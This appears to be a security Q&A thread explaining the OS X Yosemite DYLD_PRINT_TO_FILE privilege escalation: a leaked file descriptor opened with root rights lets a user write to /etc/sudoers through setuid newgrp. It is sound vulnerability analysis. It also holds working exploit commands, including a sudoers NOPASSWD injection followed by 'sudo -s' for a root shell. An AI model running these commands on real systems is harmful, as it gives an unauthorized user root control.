# How does the DYLD privilege escalation vulnerability work on OS X?

Tags: macos, vulnerability

Just reading about the DYLD privilege escalation vulnerability reported by Stefan Esser at
https://www.sektioneins.de/en/blog/15-07-07-dyld_print_to_file_lpe.html

I understand this allows anyone to create or open arbitrary files owned by root anywhere in the filesystem but I want to understand more how leaking the file descriptor to child proceses makes this a larger threat than if it didnt.

Answer (score 7):

### Analysis

When setting:

```
DYLD_PRINT_TO_FILE=/tmp/log some_command
```

the MacOS X dynamic loader will open `/tmp/log` as a log file, i.e. with append access to potentially debug problems within the dynamic loader. This file is open with the first free file descriptor in the shell calling context which is 3.
Hence the file descriptors associations are:

```
0   →   stdin
1   →   stdout
2   →   stderr
3   →   /tmp/log
```

and within this context the process `some_command` is forked.

Unfortunatly, the dynamic loader doesn't close 3. Hence the process `some_command` is running with an open file it never had to open and never went through the normal filesystem access control. This may be a file to which `some_command` should have no access if it normally tried to open it.

### Example

For example, although `newgrp` is a setuid binary it can't write on correctly protected files:

```
$ newgrp
$ echo '#comment' >&3
zsh: 3: bad file descriptor
```

this error is normal, the shell forked by `newgrp` doesn't have a file descriptor
3 open, as `lsof` permits to clearly see it (look at column FD for the 3):

```
$ lsof -p $$
COMMAND  PID USER   FD   TYPE DEVICE  SIZE/OFF      NODE NAME
[...]
zsh     2405  bob    0u   CHR   16,3      0t28      1405 /dev/ttys003
zsh     2405  bob    1u   CHR   16,3      0t28      1405 /dev/ttys003
zsh     2405  bob    2u   CHR   16,3      0t28      1405 /dev/ttys003
zsh     2405  bob    5                                   (revoked)
[...]
```

But due to the lack of closing 3 in the dynamic loader:

```
$ DYLD_PRINT_TO_FILE=/etc/sudoers newgrp
$ echo '#comment' >&3
$
```

beware: here the absence of error message means the `echo` worked.
and moreover `lsof` shows the hole (line 3w, which means file descriptor 3
opened with write access):

```
$ lsof -p $$
COMMAND  PID USER   FD   TYPE DEVICE  SIZE/OFF       NODE NAME
[...]
zsh     2430  bob    0u   CHR   16,3    0t1024       1405 /dev/ttys003
zsh     2430  bob    1u   CHR   16,3    0t1024       1405 /dev/ttys003
zsh     2430  bob    2u   CHR   16,3    0t1024       1405 /dev/ttys003
zsh     2430  bob    3w   REG    1,7      1293 2034681610 /private/etc/sudoers
zsh     2430  bob    5                                    (revoked)
[...]
```

will let `newgrp` write on `/etc/sudoers` file were it should never had occured.

### Warning

If you try this example, don't forget to clean your `/etc/sudoers` afterward,
even if this example is harmless.
Its last line contains now `#comment`.

Comment: Excellent answer. Just for reference, Metasploit PR for the above exploit should be landed soon. https://github.com/rapid7/metasploit-framework/pull/5758

Comment: `3` being left open is nice, but that's not the bug. The fact that it is opened at all is the bug. A malicious app could probably still convince `dyld` to write some useful "debugging" string into a protected file to corrupt or control it, even if `3` were closed after `dyld` was done loading.

Comment: @void_in: do you mean there exists a possibility to exploit this vulnerability remotely?

Comment: By the way, saying "although newgrp is a setuid binary it can't write on correctly protected files" is not accurate. `newgrp` can definitely write to protected files, it just doesn't offer the unprivileged caller control over that (normally). Your example doesn't even show `newgrp` trying to write to the file - you used a shell redirect which is handled before the program even starts.

Comment: You are right. Thanks. This was a simple example, to keep an explanation simple. But it lead skilled Unix admins and users focused on a working exploit, to a misunderstanding. I tried to clarify this.

Answer (score 3):

`newgrp` is a UNIX utility that executes a shell with a new group ID (see the [UNIX specification page](http://pubs.opengroup.org/onlinepubs/9699919799/utilities/newgrp.html)). This utility requires root permission since it can change the group ID to one outside the current shell's group list (e.g. to any group in the uid's group list). Therefore, newgrp is a setuid root application which launches a shell.

`DYLD_PRINT_TO_FILE` is a `dyld` (OS X dynamic linker) environment variable that tells dyld where to print debugging information. This particular variable was added in OS X 10.10 "Yosemite". It is just one of a [large number of `DYLD_` variables](https://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man1/dyld.1.html), which facilitate debugging shared library loading. When `dyld` sees 
`DYLD_PRINT_TO_FILE`, it opens a new file descriptor connected to the specified file. Since fds 0,1,2 are already connected to stdin, stdout and stderr, the file is opened as fd 3. Notably, since `newgrp` starts as root, the file is opened using root's permissions, even though `newgrp` later drops privileges to spawn the shell.

Because `DYLD_` environment variables can modify a program's behaviour in unexpected ways (particularly `DYLD_INSERT_LIBRARIES`, the OS X equivalent of `LD_PRELOAD`), they are usually deleted or sanitized prior to running setuid programs. Apple clearly forgot to sanitize the new `DYLD_PRINT_TO_FILE` when shipping Yosemite, opening this particular flaw up.

Finally, the (outer) echo command tells the subshell spawned by `newgrp` to execute the (inner) echo command, which outputs the string `$(whoami) ALL=(ALL) NOPASSWD:ALL` into fd 3, which is now `/etc/sudoers`. This line tells sudo that *any* account is allowed sudo access, and that no password is required to use sudo.

The subshell then exits (no more commands to run), and the final command `sudo -s` executes. Since sudo no longer requires a password, and all accounts can use sudo, `sudo -s` just immediately opens a root shell without prompting.

---

OS X's `dyld` does actually remove all `DYLD_` variables from the environment for `setuid` apps, as you can see in the `pruneEnvironmentVariables` function from [`dyld.cpp`](http://www.opensource.apple.com/source/dyld/dyld-353.2.1/src/dyld.cpp). So why does this bug exist at all? The answer is that `DYLD_PRINT_TO_FILE` is handled well before the sanitization takes place - in fact, it is basically the first thing that `dyld` does after starting up (see `_main` in [`dyld.cpp`](http://www.opensource.apple.com/source/dyld/dyld-353.2.1/src/dyld.cpp)). Apple's fix, therefore, should be quite simple: the file should be opened only after the environment has been properly sanitized.